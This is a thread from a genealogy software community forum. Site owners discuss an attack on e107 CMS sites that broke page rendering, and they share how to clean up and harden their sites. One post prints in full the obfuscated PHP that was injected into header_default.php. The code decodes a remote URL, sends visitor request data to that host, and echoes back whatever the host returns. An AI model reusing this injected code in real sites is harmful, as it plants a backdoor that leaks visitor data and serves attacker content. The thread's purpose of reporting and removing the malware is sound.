Jump to content
TNG Community
John Paul

My main content has disappeared

Recommended Posts

John Paul

I know most of the e107 guys haven't been around, but maybe some of the other tng guys may have a suggestion or 2 for me to look at. My site is http://jpjones.org. I'm hosted at simplyhosting (they can't see anything wrong from their end). I'm running e107 v.7.24, tng v 7.1.3 and the latest tngIL plugin. Everything was perfect until yesterday when out of the blue, all the main content is not rendering anymore. if I switch tng to unwrapped mode, tng renders fine, but it's not just tng, it's the whole site. I've even tried all the stock themes templates that ship with e107 and they all act the same, no content getting rendered. If anyone has an idea of what to look for I'd appreciate it. thanks

UPDATE: Well I found out that problem and I don't understand how it could gotten hacked, but it seems the following code got added to the end of header_default.php file:


$cf=strrev('edo'.'ced'.'_46esab');$counter=$cf('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9').md5($_SERVER['SERVER_NAME']);
$data=array('HTTP_ACCEPT_CHARSET','HTTP_ACCEPT_LANGUAGE','HTTP_HOST','HTTP_REFERER',
'HTTP_USER_AGENT','HTTP_QUERY_STRING','REMOTE_ADDR','REQUEST_URI','REQUEST_METHOD','SCRIPT_FILENAME');
foreach($data as $val){$t[]= $_SERVER[$val];}$u=$counter.'&data='.base64_encode(serialize($t));$fn=file_get_contents($u);
if(!$fn||strlen($fn<4)){ob_start();include($u);$fn=ob_get_contents();ob_clean();}
if($fn&&strlen($fn>4)){list($crc,$enc)=explode('::',$fn);if(md5($enc)==$crc){echo $cf($enc);}}

I'll be letting simplyhosting know what happened also....

Apparently this is starting to happen to other e107 sites:

http://e107.org/e107_plugins/forum/forum_v...opic.php?214505

Share this post


Link to post
Share on other sites
Martin J Mosley

This was a sustained attack on e107 and removing the inserted code as described by John Paul will bring your site back.

For the moment it is not known by what route the code was inserted, so remember that removing the rogue code will put your site back on line, but has not solved the problem.. The e107 team are working on it and will publish recommendations as soon as possible. In the meantime, keep an eye on your site.

Mine was attacked, I removed the offending code straight away and for the moment no further problems, but until a solution is found I'll be watching closely.

For more info check on e107.org

Regards

Share this post


Link to post
Share on other sites
ca_drm1n

This was a sustained attack on e107 and removing the inserted code as described by John Paul will bring your site back.

For the moment it is not known by what route the code was inserted, so remember that removing the rogue code will put your site back on line, but has not solved the problem.. The e107 team are working on it and will publish recommendations as soon as possible. In the meantime, keep an eye on your site.

Mine was attacked, I removed the offending code straight away and for the moment no further problems, but until a solution is found I'll be watching closely.

For more info check on e107.org

Regards

After noting that both my e107 sites (one TNG and one not) had been hit by this, I saw JP's post on the e107 forums and did the fix on my site as well. I also added

?>

to the end of the header_default.php file, to hopefully mitigate the issue of any code being added on again (if it comes after that, at least the php won't execute). I also updated the permissions from 664 to 660 for that file (maybe it should be even MORE restrictive?).

Of note, there was a second file modified at the same time - core_image.php file under the admin folder. Not sure exactly what they did to it, but the time/date of the file synched up with the time of the malicious change to header_default.php page in themes/templates. Be sure to restore that one as well.

As an aside, I am still running 0.7.22, so whatever the issue, it's not limited to the latest version of e107.

- Al

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×